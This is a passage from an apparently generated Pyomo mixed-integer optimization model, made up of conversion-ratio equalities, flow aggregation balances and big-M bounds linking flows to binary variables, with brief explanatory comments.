Constraint(expr= m.x506 - 33.75*m.b770 <= 0) m.c450 = Constraint(expr= m.x507 - 46.5*m.b771 <= 0) m.c451 = Constraint(expr= m.x508 - 31.5*m.b772 <= 0) m.c452 = Constraint(expr= m.x509 - 33.75*m.b773 <= 0) m.c453 = Constraint(expr= m.x510 - 46.5*m.b774 <= 0) m.c454 = Constraint(expr= m.x511 - 31.5*m.b775 <= 0) m.c455 = Constraint(expr= m.x548 - 135*m.b776 <= 0) m.c456 = Constraint(expr= m.x549 - 127.5*m.b777 <= 0) m.c457 = Constraint(expr= m.x550 - 125*m.b778 <= 0) m.c458 = Constraint(expr= m.x551 - 135*m.b779 <= 0) m.c459 = Constraint(expr= m.x552 - 127.5*m.b780 <= 0) m.c460 = Constraint(expr= m.x553 - 125*m.b781 <= 0) m.c461 = Constraint(expr= m.x554 - 135*m.b782 <= 0) m.c462 = Constraint(expr= m.x555 - 127.5*m.b783 <= 0) m.c463 = Constraint(expr= m.x556 - 125*m.b784 <= 0) m.c464 = Constraint(expr= m.x557 - 135*m.b785 <= 0) m.c465 = Constraint(expr= m.x558 - 127.5*m.b786 <= 0) m.c466 = Constraint(expr= m.x559 - 125*m.b787 <= 0) m.c467 = Constraint(expr= m.x584 - 57.1428571428571*m.b788 <= 0) m.c468 = Constraint(expr= m.x585 - 64.2857142857143*m.b789 <= 0) m.c469 = Constraint(expr= m.x586 - 58.5714285714286*m.b790 <= 0) m.c470 = Constraint(expr= m.x587 - 57.1428571428571*m.b791 <= 0) m.c471 = Constraint(expr= m.x588 - 64.2857142857143*m.b792 <= 0) m.c472 = Constraint(expr= m.x589 - 58.5714285714286*m.b793 <= 0) m.c473 = Constraint(expr= m.x590 - 57.1428571428571*m.b794 <= 0) m.c474 = Constraint(expr= m.x591 - 64.2857142857143*m.b795 <= 0) m.c475 = Constraint(expr= m.x592 - 58.5714285714286*m.b796 <= 0) m.c476 = Constraint(expr= m.x593 - 57.1428571428571*m.b797 <= 0) m.c477 = Constraint(expr= m.x594 - 64.2857142857143*m.b798 <= 0) m.c478 = Constraint(expr= m.x595 - 58.5714285714286*m.b799 <= 0) m.c479 = Constraint(expr= - 0.8*m.x392 + m.x416 == 0) m.c480 = Constraint(expr= - 0.8*m.x393 + m.x417 == 0) m.c481 = Constraint(expr= - 0.8*m.x394 + m.x418 == 0) m.c482 = Constraint(expr= - 0.85*m.x395 + m.x419 == 0) m.c483 = Constraint(expr= - 0.85*m.x396 + m.x420 == 0) 
m.c484 = Constraint(expr= - 0.85*m.x397 + m.x421 == 0) m.c485 = Constraint(expr= - 0.8*m.x398 + m.x422 == 0) m.c486 = Constraint(expr= - 0.8*m.x399 + m.x423 == 0) m.c487 = Constraint(expr= - 0.8*m.x400 + m.x424 == 0) m.c488 = Constraint(expr= - 0.85*m.x401 + m.x425 == 0) m.c489 = Constraint(expr= - 0.85*m.x402 + m.x426 == 0) m.c490 = Constraint(expr= - 0.85*m.x403 + m.x427 == 0) m.c491 = Constraint(expr= - 0.9*m.x404 + m.x428 == 0) m.c492 = Constraint(expr= - 0.9*m.x405 + m.x429 == 0) m.c493 = Constraint(expr= - 0.9*m.x406 + m.x430 == 0) m.c494 = Constraint(expr= - 0.95*m.x407 + m.x431 == 0) m.c495 = Constraint(expr= - 0.95*m.x408 + m.x432 == 0) m.c496 = Constraint(expr= - 0.95*m.x409 + m.x433 == 0) m.c497 = Constraint(expr= - 0.9*m.x410 + m.x434 == 0) m.c498 = Constraint(expr= - 0.9*m.x411 + m.x435 == 0) m.c499 = Constraint(expr= - 0.9*m.x412 + m.x436 == 0) m.c500 = Constraint(expr= - 0.95*m.x413 + m.x437 == 0) m.c501 = Constraint(expr= - 0.95*m.x414 + m.x438 == 0) m.c502 = Constraint(expr= - 0.95*m.x415 + m.x439 == 0) m.c503 = Constraint(expr= - 0.85*m.x440 + m.x452 == 0) m.c504 = Constraint(expr= - 0.85*m.x441 + m.x453 == 0) m.c505 = Constraint(expr= - 0.85*m.x442 + m.x454 == 0) m.c506 = Constraint(expr= - 0.98*m.x443 + m.x455 == 0) m.c507 = Constraint(expr= - 0.98*m.x444 + m.x456 == 0) m.c508 = Constraint(expr= - 0.98*m.x445 + m.x457 == 0) m.c509 = Constraint(expr= - 0.85*m.x446 + m.x458 == 0) m.c510 = Constraint(expr= - 0.85*m.x447 + m.x459 == 0) m.c511 = Constraint(expr= - 0.85*m.x448 + m.x460 == 0) m.c512 = Constraint(expr= - 0.98*m.x449 + m.x461 == 0) m.c513 = Constraint(expr= - 0.98*m.x450 + m.x462 == 0) m.c514 = Constraint(expr= - 0.98*m.x451 + m.x463 == 0) m.c515 = Constraint(expr= - 0.85*m.x440 + m.x464 == 0) m.c516 = Constraint(expr= - 0.85*m.x441 + m.x465 == 0) m.c517 = Constraint(expr= - 0.85*m.x442 + m.x466 == 0) m.c518 = Constraint(expr= - 0.98*m.x443 + m.x467 == 0) m.c519 = Constraint(expr= - 0.98*m.x444 + m.x468 == 0) m.c520 = Constraint(expr= - 
0.98*m.x445 + m.x469 == 0) m.c521 = Constraint(expr= - 0.85*m.x446 + m.x470 == 0) m.c522 = Constraint(expr= - 0.85*m.x447 + m.x471 == 0) m.c523 = Constraint(expr= - 0.85*m.x448 + m.x472 == 0) m.c524 = Constraint(expr= - 0.98*m.x449 + m.x473 == 0) m.c525 = Constraint(expr= - 0.98*m.x450 + m.x474 == 0) m.c526 = Constraint(expr= - 0.98*m.x451 + m.x475 == 0) m.c527 = Constraint(expr= - 0.85*m.x476 + m.x488 == 0) m.c528 = Constraint(expr= - 0.85*m.x477 + m.x489 == 0) m.c529 = Constraint(expr= - 0.85*m.x478 + m.x490 == 0) m.c530 = Constraint(expr= - 0.9*m.x479 + m.x491 == 0) m.c531 = Constraint(expr= - 0.9*m.x480 + m.x492 == 0) m.c532 = Constraint(expr= - 0.9*m.x481 + m.x493 == 0) m.c533 = Constraint(expr= - 0.85*m.x482 + m.x494 == 0) m.c534 = Constraint(expr= - 0.85*m.x483 + m.x495 == 0) m.c535 = Constraint(expr= - 0.85*m.x484 + m.x496 == 0) m.c536 = Constraint(expr= - 0.9*m.x485 + m.x497 == 0) m.c537 = Constraint(expr= - 0.9*m.x486 + m.x498 == 0) m.c538 = Constraint(expr= - 0.9*m.x487 + m.x499 == 0) m.c539 = Constraint(expr= - 0.75*m.x512 + m.x524 == 0) m.c540 = Constraint(expr= - 0.75*m.x513 + m.x525 == 0) m.c541 = Constraint(expr= - 0.75*m.x514 + m.x526 == 0) m.c542 = Constraint(expr= - 0.95*m.x515 + m.x527 == 0) m.c543 = Constraint(expr= - 0.95*m.x516 + m.x528 == 0) m.c544 = Constraint(expr= - 0.95*m.x517 + m.x529 == 0) m.c545 = Constraint(expr= - 0.9*m.x518 + m.x530 == 0) m.c546 = Constraint(expr= - 0.9*m.x519 + m.x531 == 0) m.c547 = Constraint(expr= - 0.9*m.x520 + m.x532 == 0) m.c548 = Constraint(expr= - 0.95*m.x521 + m.x533 == 0) m.c549 = Constraint(expr= - 0.95*m.x522 + m.x534 == 0) m.c550 = Constraint(expr= - 0.95*m.x523 + m.x535 == 0) m.c551 = Constraint(expr= - 0.75*m.x512 + m.x536 == 0) m.c552 = Constraint(expr= - 0.75*m.x513 + m.x537 == 0) m.c553 = Constraint(expr= - 0.75*m.x514 + m.x538 == 0) m.c554 = Constraint(expr= - 0.95*m.x515 + m.x539 == 0) m.c555 = Constraint(expr= - 0.95*m.x516 + m.x540 == 0) m.c556 = Constraint(expr= - 0.95*m.x517 + m.x541 == 0) 
# --- c557-c598: remaining fixed-factor conversion equalities (x_out == f*x_in),
# same pattern as c484-c556 above.
m.c557 = Constraint(expr= - 0.9*m.x518 + m.x542 == 0)
m.c558 = Constraint(expr= - 0.9*m.x519 + m.x543 == 0)
m.c559 = Constraint(expr= - 0.9*m.x520 + m.x544 == 0)
m.c560 = Constraint(expr= - 0.95*m.x521 + m.x545 == 0)
m.c561 = Constraint(expr= - 0.95*m.x522 + m.x546 == 0)
m.c562 = Constraint(expr= - 0.95*m.x523 + m.x547 == 0)
m.c563 = Constraint(expr= - 0.8*m.x500 + m.x560 == 0)
m.c564 = Constraint(expr= - 0.8*m.x501 + m.x561 == 0)
m.c565 = Constraint(expr= - 0.8*m.x502 + m.x562 == 0)
m.c566 = Constraint(expr= - 0.85*m.x503 + m.x563 == 0)
m.c567 = Constraint(expr= - 0.85*m.x504 + m.x564 == 0)
m.c568 = Constraint(expr= - 0.85*m.x505 + m.x565 == 0)
m.c569 = Constraint(expr= - 0.8*m.x506 + m.x566 == 0)
m.c570 = Constraint(expr= - 0.8*m.x507 + m.x567 == 0)
m.c571 = Constraint(expr= - 0.8*m.x508 + m.x568 == 0)
m.c572 = Constraint(expr= - 0.85*m.x509 + m.x569 == 0)
m.c573 = Constraint(expr= - 0.85*m.x510 + m.x570 == 0)
m.c574 = Constraint(expr= - 0.85*m.x511 + m.x571 == 0)
m.c575 = Constraint(expr= - 0.85*m.x548 + m.x572 == 0)
m.c576 = Constraint(expr= - 0.85*m.x549 + m.x573 == 0)
m.c577 = Constraint(expr= - 0.85*m.x550 + m.x574 == 0)
m.c578 = Constraint(expr= - 0.95*m.x551 + m.x575 == 0)
m.c579 = Constraint(expr= - 0.95*m.x552 + m.x576 == 0)
m.c580 = Constraint(expr= - 0.95*m.x553 + m.x577 == 0)
m.c581 = Constraint(expr= - 0.85*m.x554 + m.x578 == 0)
m.c582 = Constraint(expr= - 0.85*m.x555 + m.x579 == 0)
m.c583 = Constraint(expr= - 0.85*m.x556 + m.x580 == 0)
m.c584 = Constraint(expr= - 0.95*m.x557 + m.x581 == 0)
m.c585 = Constraint(expr= - 0.95*m.x558 + m.x582 == 0)
m.c586 = Constraint(expr= - 0.95*m.x559 + m.x583 == 0)
m.c587 = Constraint(expr= - 0.8*m.x584 + m.x596 == 0)
m.c588 = Constraint(expr= - 0.8*m.x585 + m.x597 == 0)
m.c589 = Constraint(expr= - 0.8*m.x586 + m.x598 == 0)
m.c590 = Constraint(expr= - 0.92*m.x587 + m.x599 == 0)
m.c591 = Constraint(expr= - 0.92*m.x588 + m.x600 == 0)
m.c592 = Constraint(expr= - 0.92*m.x589 + m.x601 == 0)
m.c593 = Constraint(expr= - 0.8*m.x590 + m.x602 == 0)
m.c594 = Constraint(expr= - 0.8*m.x591 + m.x603 == 0)
m.c595 = Constraint(expr= - 0.8*m.x592 + m.x604 == 0)
m.c596 = Constraint(expr= - 0.92*m.x593 + m.x605 == 0)
m.c597 = Constraint(expr= - 0.92*m.x594 + m.x606 == 0)
m.c598 = Constraint(expr= - 0.92*m.x595 + m.x607 == 0)
# --- c599-c631 (continues into next section): aggregation balances.
# Each splits a total into four parts, e.g. c599 forces
# x5 == x260 + x263 + x266 + x269.  The four addends of each total are
# spaced 3 apart (offsets +0,+3,+6,+9 from a group base).
m.c599 = Constraint(expr= m.x5 - m.x260 - m.x263 - m.x266 - m.x269 == 0)
m.c600 = Constraint(expr= m.x6 - m.x261 - m.x264 - m.x267 - m.x270 == 0)
m.c601 = Constraint(expr= m.x7 - m.x262 - m.x265 - m.x268 - m.x271 == 0)
m.c602 = Constraint(expr= m.x8 - m.x272 - m.x275 - m.x278 - m.x281 == 0)
m.c603 = Constraint(expr= m.x9 - m.x273 - m.x276 - m.x279 - m.x282 == 0)
m.c604 = Constraint(expr= m.x10 - m.x274 - m.x277 - m.x280 - m.x283 == 0)
m.c605 = Constraint(expr= m.x20 - m.x284 - m.x287 - m.x290 - m.x293 == 0)
m.c606 = Constraint(expr= m.x21 - m.x285 - m.x288 - m.x291 - m.x294 == 0)
m.c607 = Constraint(expr= m.x22 - m.x286 - m.x289 - m.x292 - m.x295 == 0)
m.c608 = Constraint(expr= m.x32 - m.x296 - m.x299 - m.x302 - m.x305 == 0)
m.c609 = Constraint(expr= m.x33 - m.x297 - m.x300 - m.x303 - m.x306 == 0)
m.c610 = Constraint(expr= m.x34 - m.x298 - m.x301 - m.x304 - m.x307 == 0)
m.c611 = Constraint(expr= m.x41 - m.x308 - m.x311 - m.x314 - m.x317 == 0)
m.c612 = Constraint(expr= m.x42 - m.x309 - m.x312 - m.x315 - m.x318 == 0)
m.c613 = Constraint(expr= m.x43 - m.x310 - m.x313 - m.x316 - m.x319 == 0)
# NOTE(review): the pairing below is intentionally non-monotonic in the
# generated output (x50 group uses x332.., while x47 group uses x320..).
m.c614 = Constraint(expr= m.x50 - m.x332 - m.x335 - m.x338 - m.x341 == 0)
m.c615 = Constraint(expr= m.x51 - m.x333 - m.x336 - m.x339 - m.x342 == 0)
m.c616 = Constraint(expr= m.x52 - m.x334 - m.x337 - m.x340 - m.x343 == 0)
m.c617 = Constraint(expr= m.x47 - m.x320 - m.x323 - m.x326 - m.x329 == 0)
m.c618 = Constraint(expr= m.x48 - m.x321 - m.x324 - m.x327 - m.x330 == 0)
m.c619 = Constraint(expr= m.x49 - m.x322 - m.x325 - m.x328 - m.x331 == 0)
m.c620 = Constraint(expr= m.x68 - m.x344 - m.x347 - m.x350 - m.x353 == 0)
m.c621 = Constraint(expr= m.x69 - m.x345 - m.x348 - m.x351 - m.x354 == 0)
# --- c622-c631: last of the aggregation balances started at c599.
m.c622 = Constraint(expr= m.x70 - m.x346 - m.x349 - m.x352 - m.x355 == 0)
m.c623 = Constraint(expr= m.x71 - m.x356 - m.x359 - m.x362 - m.x365 == 0)
m.c624 = Constraint(expr= m.x72 - m.x357 - m.x360 - m.x363 - m.x366 == 0)
m.c625 = Constraint(expr= m.x73 - m.x358 - m.x361 - m.x364 - m.x367 == 0)
m.c626 = Constraint(expr= m.x92 - m.x380 - m.x383 - m.x386 - m.x389 == 0)
m.c627 = Constraint(expr= m.x93 - m.x381 - m.x384 - m.x387 - m.x390 == 0)
m.c628 = Constraint(expr= m.x94 - m.x382 - m.x385 - m.x388 - m.x391 == 0)
m.c629 = Constraint(expr= m.x89 - m.x368 - m.x371 - m.x374 - m.x377 == 0)
m.c630 = Constraint(expr= m.x90 - m.x369 - m.x372 - m.x375 - m.x378 == 0)
m.c631 = Constraint(expr= m.x91 - m.x370 - m.x373 - m.x376 - m.x379 == 0)
# --- c632-c763: big-M linking bounds, x_k - M*b_j <= 0.
# Each continuous x can be positive only when its paired binary b is 1
# (M is the per-variable upper bound).  Note some binary groups are shared:
# e.g. b716-b727 cap both x272-x283 (c644-c655) and x284-x295 (c656-c667),
# and b764-b775 cap both x320-x331 (c704-c715) and x344-x355 (c716-c727).
m.c632 = Constraint(expr= m.x260 - 55*m.b704 <= 0)
m.c633 = Constraint(expr= m.x261 - 40*m.b705 <= 0)
m.c634 = Constraint(expr= m.x262 - 40*m.b706 <= 0)
m.c635 = Constraint(expr= m.x263 - 55*m.b707 <= 0)
m.c636 = Constraint(expr= m.x264 - 40*m.b708 <= 0)
m.c637 = Constraint(expr= m.x265 - 40*m.b709 <= 0)
m.c638 = Constraint(expr= m.x266 - 55*m.b710 <= 0)
m.c639 = Constraint(expr= m.x267 - 40*m.b711 <= 0)
m.c640 = Constraint(expr= m.x268 - 40*m.b712 <= 0)
m.c641 = Constraint(expr= m.x269 - 55*m.b713 <= 0)
m.c642 = Constraint(expr= m.x270 - 40*m.b714 <= 0)
m.c643 = Constraint(expr= m.x271 - 40*m.b715 <= 0)
m.c644 = Constraint(expr= m.x272 - 55*m.b716 <= 0)
m.c645 = Constraint(expr= m.x273 - 40*m.b717 <= 0)
m.c646 = Constraint(expr= m.x274 - 40*m.b718 <= 0)
m.c647 = Constraint(expr= m.x275 - 55*m.b719 <= 0)
m.c648 = Constraint(expr= m.x276 - 40*m.b720 <= 0)
m.c649 = Constraint(expr= m.x277 - 40*m.b721 <= 0)
m.c650 = Constraint(expr= m.x278 - 55*m.b722 <= 0)
m.c651 = Constraint(expr= m.x279 - 40*m.b723 <= 0)
m.c652 = Constraint(expr= m.x280 - 40*m.b724 <= 0)
m.c653 = Constraint(expr= m.x281 - 55*m.b725 <= 0)
m.c654 = Constraint(expr= m.x282 - 40*m.b726 <= 0)
m.c655 = Constraint(expr= m.x283 - 40*m.b727 <= 0)
m.c656 = Constraint(expr= m.x284 - 91*m.b716 <= 0)
m.c657 = Constraint(expr= m.x285 - 103*m.b717 <= 0)
m.c658 = Constraint(expr= m.x286 - 92*m.b718 <= 0)
m.c659 = Constraint(expr= m.x287 - 91*m.b719 <= 0)
m.c660 = Constraint(expr= m.x288 - 103*m.b720 <= 0)
m.c661 = Constraint(expr= m.x289 - 92*m.b721 <= 0)
m.c662 = Constraint(expr= m.x290 - 91*m.b722 <= 0)
m.c663 = Constraint(expr= m.x291 - 103*m.b723 <= 0)
m.c664 = Constraint(expr= m.x292 - 92*m.b724 <= 0)
m.c665 = Constraint(expr= m.x293 - 91*m.b725 <= 0)
m.c666 = Constraint(expr= m.x294 - 103*m.b726 <= 0)
m.c667 = Constraint(expr= m.x295 - 92*m.b727 <= 0)
m.c668 = Constraint(expr= m.x296 - 45*m.b728 <= 0)
m.c669 = Constraint(expr= m.x297 - 62*m.b729 <= 0)
m.c670 = Constraint(expr= m.x298 - 42*m.b730 <= 0)
m.c671 = Constraint(expr= m.x299 - 45*m.b731 <= 0)
m.c672 = Constraint(expr= m.x300 - 62*m.b732 <= 0)
m.c673 = Constraint(expr= m.x301 - 42*m.b733 <= 0)
m.c674 = Constraint(expr= m.x302 - 45*m.b734 <= 0)
m.c675 = Constraint(expr= m.x303 - 62*m.b735 <= 0)
m.c676 = Constraint(expr= m.x304 - 42*m.b736 <= 0)
m.c677 = Constraint(expr= m.x305 - 45*m.b737 <= 0)
m.c678 = Constraint(expr= m.x306 - 62*m.b738 <= 0)
m.c679 = Constraint(expr= m.x307 - 42*m.b739 <= 0)
m.c680 = Constraint(expr= m.x308 - 45*m.b740 <= 0)
m.c681 = Constraint(expr= m.x309 - 62*m.b741 <= 0)
m.c682 = Constraint(expr= m.x310 - 42*m.b742 <= 0)
m.c683 = Constraint(expr= m.x311 - 45*m.b743 <= 0)
m.c684 = Constraint(expr= m.x312 - 62*m.b744 <= 0)
m.c685 = Constraint(expr= m.x313 - 42*m.b745 <= 0)
m.c686 = Constraint(expr= m.x314 - 45*m.b746 <= 0)
m.c687 = Constraint(expr= m.x315 - 62*m.b747 <= 0)
m.c688 = Constraint(expr= m.x316 - 42*m.b748 <= 0)
m.c689 = Constraint(expr= m.x317 - 45*m.b749 <= 0)
m.c690 = Constraint(expr= m.x318 - 62*m.b750 <= 0)
m.c691 = Constraint(expr= m.x319 - 42*m.b751 <= 0)
m.c692 = Constraint(expr= m.x332 - 45*m.b752 <= 0)
m.c693 = Constraint(expr= m.x333 - 62*m.b753 <= 0)
m.c694 = Constraint(expr= m.x334 - 42*m.b754 <= 0)
m.c695 = Constraint(expr= m.x335 - 45*m.b755 <= 0)
m.c696 = Constraint(expr= m.x336 - 62*m.b756 <= 0)
m.c697 = Constraint(expr= m.x337 - 42*m.b757 <= 0)
m.c698 = Constraint(expr= m.x338 - 45*m.b758 <= 0)
m.c699 = Constraint(expr= m.x339 - 62*m.b759 <= 0)
m.c700 = Constraint(expr= m.x340 - 42*m.b760 <= 0)
m.c701 = Constraint(expr= m.x341 - 45*m.b761 <= 0)
m.c702 = Constraint(expr= m.x342 - 62*m.b762 <= 0)
m.c703 = Constraint(expr= m.x343 - 42*m.b763 <= 0)
m.c704 = Constraint(expr= m.x320 - 45*m.b764 <= 0)
m.c705 = Constraint(expr= m.x321 - 62*m.b765 <= 0)
m.c706 = Constraint(expr= m.x322 - 42*m.b766 <= 0)
m.c707 = Constraint(expr= m.x323 - 45*m.b767 <= 0)
m.c708 = Constraint(expr= m.x324 - 62*m.b768 <= 0)
m.c709 = Constraint(expr= m.x325 - 42*m.b769 <= 0)
m.c710 = Constraint(expr= m.x326 - 45*m.b770 <= 0)
m.c711 = Constraint(expr= m.x327 - 62*m.b771 <= 0)
m.c712 = Constraint(expr= m.x328 - 42*m.b772 <= 0)
m.c713 = Constraint(expr= m.x329 - 45*m.b773 <= 0)
m.c714 = Constraint(expr= m.x330 - 62*m.b774 <= 0)
m.c715 = Constraint(expr= m.x331 - 42*m.b775 <= 0)
m.c716 = Constraint(expr= m.x344 - 54*m.b764 <= 0)
m.c717 = Constraint(expr= m.x345 - 51*m.b765 <= 0)
m.c718 = Constraint(expr= m.x346 - 50*m.b766 <= 0)
m.c719 = Constraint(expr= m.x347 - 54*m.b767 <= 0)
m.c720 = Constraint(expr= m.x348 - 51*m.b768 <= 0)
m.c721 = Constraint(expr= m.x349 - 50*m.b769 <= 0)
m.c722 = Constraint(expr= m.x350 - 54*m.b770 <= 0)
m.c723 = Constraint(expr= m.x351 - 51*m.b771 <= 0)
m.c724 = Constraint(expr= m.x352 - 50*m.b772 <= 0)
m.c725 = Constraint(expr= m.x353 - 54*m.b773 <= 0)
m.c726 = Constraint(expr= m.x354 - 51*m.b774 <= 0)
m.c727 = Constraint(expr= m.x355 - 50*m.b775 <= 0)
m.c728 = Constraint(expr= m.x356 - 54*m.b776 <= 0)
m.c729 = Constraint(expr= m.x357 - 51*m.b777 <= 0)
m.c730 = Constraint(expr= m.x358 - 50*m.b778 <= 0)
m.c731 = Constraint(expr= m.x359 - 54*m.b779 <= 0)
m.c732 = Constraint(expr= m.x360 - 51*m.b780 <= 0)
m.c733 = Constraint(expr= m.x361 - 50*m.b781 <= 0)
m.c734 = Constraint(expr= m.x362 - 54*m.b782 <= 0)
m.c735 = Constraint(expr= m.x363 - 51*m.b783 <= 0)
m.c736 = Constraint(expr= m.x364 - 50*m.b784 <= 0)
m.c737 = Constraint(expr= m.x365 - 54*m.b785 <= 0)
m.c738 = Constraint(expr= m.x366 - 51*m.b786 <= 0)
m.c739 = Constraint(expr= m.x367 - 50*m.b787 <= 0)
m.c740 = Constraint(expr= m.x380 - 40*m.b776 <= 0)
m.c741 = Constraint(expr= m.x381 - 45*m.b777 <= 0)
m.c742 = Constraint(expr= m.x382 - 41*m.b778 <= 0)
m.c743 = Constraint(expr= m.x383 - 40*m.b779 <= 0)
m.c744 = Constraint(expr= m.x384 - 45*m.b780 <= 0)
m.c745 = Constraint(expr= m.x385 - 41*m.b781 <= 0)
m.c746 = Constraint(expr= m.x386 - 40*m.b782 <= 0)
m.c747 = Constraint(expr= m.x387 - 45*m.b783 <= 0)
m.c748 = Constraint(expr= m.x388 - 41*m.b784 <= 0)
m.c749 = Constraint(expr= m.x389 - 40*m.b785 <= 0)
m.c750 = Constraint(expr= m.x390 - 45*m.b786 <= 0)
m.c751 = Constraint(expr= m.x391 - 41*m.b787 <= 0)
m.c752 = Constraint(expr= m.x368 - 40*m.b788 <= 0)
m.c753 = Constraint(expr= m.x369 - 45*m.b789 <= 0)
m.c754 = Constraint(expr= m.x370 - 41*m.b790 <= 0)
m.c755 = Constraint(expr= m.x371 - 40*m.b791 <= 0)
m.c756 = Constraint(expr= m.x372 - 45*m.b792 <= 0)
m.c757 = Constraint(expr= m.x373 - 41*m.b793 <= 0)
m.c758 = Constraint(expr= m.x374 - 40*m.b794 <= 0)
m.c759 = Constraint(expr= m.x375 - 45*m.b795 <= 0)
m.c760 = Constraint(expr= m.x376 - 41*m.b796 <= 0)
m.c761 = Constraint(expr= m.x377 - 40*m.b797 <= 0)
m.c762 = Constraint(expr= m.x378 - 45*m.b798 <= 0)
m.c763 = Constraint(expr= m.x379 - 41*m.b799 <= 0)
# --- c764-c859 (continues into next section): a second, tighter set of
# binary-linked caps over the same x/b pairs as c632-c763, with smaller
# M values (e.g. c764 caps x260 at 10*b704 vs 55*b704 in c632).
m.c764 = Constraint(expr= m.x260 - 10*m.b704 <= 0)
m.c765 = Constraint(expr= m.x261 - 10*m.b705 <= 0)
m.c766 = Constraint(expr= m.x262 - 10*m.b706 <= 0)
m.c767 = Constraint(expr= m.x263 - 10*m.b707 <= 0)
m.c768 = Constraint(expr= m.x264 - 10*m.b708 <= 0)
m.c769 = Constraint(expr= m.x265 - 10*m.b709 <= 0)
m.c770 = Constraint(expr= m.x266 - 50*m.b710 <= 0)
m.c771 = Constraint(expr= m.x267 - 50*m.b711 <= 0)
m.c772 = Constraint(expr= m.x268 - 50*m.b712 <= 0)
m.c773 = Constraint(expr= m.x269 - 50*m.b713 <= 0)
# --- c774-c859: continuation of the second cap set begun at c764.
# Some caps bound a SUM of two flows against one binary (e.g. c776:
# x272 + x284 <= 40*b716), so the pair shares one capacity.
m.c774 = Constraint(expr= m.x270 - 50*m.b714 <= 0)
m.c775 = Constraint(expr= m.x271 - 50*m.b715 <= 0)
m.c776 = Constraint(expr= m.x272 + m.x284 - 40*m.b716 <= 0)
m.c777 = Constraint(expr= m.x273 + m.x285 - 40*m.b717 <= 0)
m.c778 = Constraint(expr= m.x274 + m.x286 - 40*m.b718 <= 0)
m.c779 = Constraint(expr= m.x275 + m.x287 - 40*m.b719 <= 0)
m.c780 = Constraint(expr= m.x276 + m.x288 - 40*m.b720 <= 0)
m.c781 = Constraint(expr= m.x277 + m.x289 - 40*m.b721 <= 0)
m.c782 = Constraint(expr= m.x278 + m.x290 - 60*m.b722 <= 0)
m.c783 = Constraint(expr= m.x279 + m.x291 - 60*m.b723 <= 0)
m.c784 = Constraint(expr= m.x280 + m.x292 - 60*m.b724 <= 0)
m.c785 = Constraint(expr= m.x281 + m.x293 - 60*m.b725 <= 0)
m.c786 = Constraint(expr= m.x282 + m.x294 - 60*m.b726 <= 0)
m.c787 = Constraint(expr= m.x283 + m.x295 - 60*m.b727 <= 0)
m.c788 = Constraint(expr= m.x296 - 15*m.b728 <= 0)
m.c789 = Constraint(expr= m.x297 - 15*m.b729 <= 0)
m.c790 = Constraint(expr= m.x298 - 15*m.b730 <= 0)
m.c791 = Constraint(expr= m.x299 - 15*m.b731 <= 0)
m.c792 = Constraint(expr= m.x300 - 15*m.b732 <= 0)
m.c793 = Constraint(expr= m.x301 - 15*m.b733 <= 0)
m.c794 = Constraint(expr= m.x302 - 25*m.b734 <= 0)
m.c795 = Constraint(expr= m.x303 - 25*m.b735 <= 0)
m.c796 = Constraint(expr= m.x304 - 25*m.b736 <= 0)
m.c797 = Constraint(expr= m.x305 - 25*m.b737 <= 0)
m.c798 = Constraint(expr= m.x306 - 25*m.b738 <= 0)
m.c799 = Constraint(expr= m.x307 - 25*m.b739 <= 0)
m.c800 = Constraint(expr= m.x308 - 15*m.b740 <= 0)
m.c801 = Constraint(expr= m.x309 - 15*m.b741 <= 0)
m.c802 = Constraint(expr= m.x310 - 15*m.b742 <= 0)
m.c803 = Constraint(expr= m.x311 - 15*m.b743 <= 0)
m.c804 = Constraint(expr= m.x312 - 15*m.b744 <= 0)
m.c805 = Constraint(expr= m.x313 - 15*m.b745 <= 0)
m.c806 = Constraint(expr= m.x314 - 20*m.b746 <= 0)
m.c807 = Constraint(expr= m.x315 - 20*m.b747 <= 0)
m.c808 = Constraint(expr= m.x316 - 20*m.b748 <= 0)
m.c809 = Constraint(expr= m.x317 - 20*m.b749 <= 0)
m.c810 = Constraint(expr= m.x318 - 20*m.b750 <= 0)
m.c811 = Constraint(expr= m.x319 - 20*m.b751 <= 0)
m.c812 = Constraint(expr= m.x332 - 10*m.b752 <= 0)
m.c813 = Constraint(expr= m.x333 - 10*m.b753 <= 0)
m.c814 = Constraint(expr= m.x334 - 10*m.b754 <= 0)
m.c815 = Constraint(expr= m.x335 - 10*m.b755 <= 0)
m.c816 = Constraint(expr= m.x336 - 10*m.b756 <= 0)
m.c817 = Constraint(expr= m.x337 - 10*m.b757 <= 0)
m.c818 = Constraint(expr= m.x338 - 20*m.b758 <= 0)
m.c819 = Constraint(expr= m.x339 - 20*m.b759 <= 0)
m.c820 = Constraint(expr= m.x340 - 20*m.b760 <= 0)
m.c821 = Constraint(expr= m.x341 - 20*m.b761 <= 0)
m.c822 = Constraint(expr= m.x342 - 20*m.b762 <= 0)
m.c823 = Constraint(expr= m.x343 - 20*m.b763 <= 0)
m.c824 = Constraint(expr= m.x320 + m.x344 - 20*m.b764 <= 0)
m.c825 = Constraint(expr= m.x321 + m.x345 - 20*m.b765 <= 0)
m.c826 = Constraint(expr= m.x322 + m.x346 - 20*m.b766 <= 0)
m.c827 = Constraint(expr= m.x323 + m.x347 - 20*m.b767 <= 0)
m.c828 = Constraint(expr= m.x324 + m.x348 - 20*m.b768 <= 0)
m.c829 = Constraint(expr= m.x325 + m.x349 - 20*m.b769 <= 0)
m.c830 = Constraint(expr= m.x326 + m.x350 - 55*m.b770 <= 0)
m.c831 = Constraint(expr= m.x327 + m.x351 - 55*m.b771 <= 0)
m.c832 = Constraint(expr= m.x328 + m.x352 - 55*m.b772 <= 0)
m.c833 = Constraint(expr= m.x329 + m.x353 - 55*m.b773 <= 0)
m.c834 = Constraint(expr= m.x330 + m.x354 - 55*m.b774 <= 0)
m.c835 = Constraint(expr= m.x331 + m.x355 - 55*m.b775 <= 0)
m.c836 = Constraint(expr= m.x356 + m.x380 - 25*m.b776 <= 0)
m.c837 = Constraint(expr= m.x357 + m.x381 - 25*m.b777 <= 0)
m.c838 = Constraint(expr= m.x358 + m.x382 - 25*m.b778 <= 0)
m.c839 = Constraint(expr= m.x359 + m.x383 - 25*m.b779 <= 0)
m.c840 = Constraint(expr= m.x360 + m.x384 - 25*m.b780 <= 0)
m.c841 = Constraint(expr= m.x361 + m.x385 - 25*m.b781 <= 0)
m.c842 = Constraint(expr= m.x362 + m.x386 - 50*m.b782 <= 0)
m.c843 = Constraint(expr= m.x363 + m.x387 - 50*m.b783 <= 0)
m.c844 = Constraint(expr= m.x364 + m.x388 - 50*m.b784 <= 0)
m.c845 = Constraint(expr= m.x365 + m.x389 - 50*m.b785 <= 0)
m.c846 = Constraint(expr= m.x366 + m.x390 - 50*m.b786 <= 0)
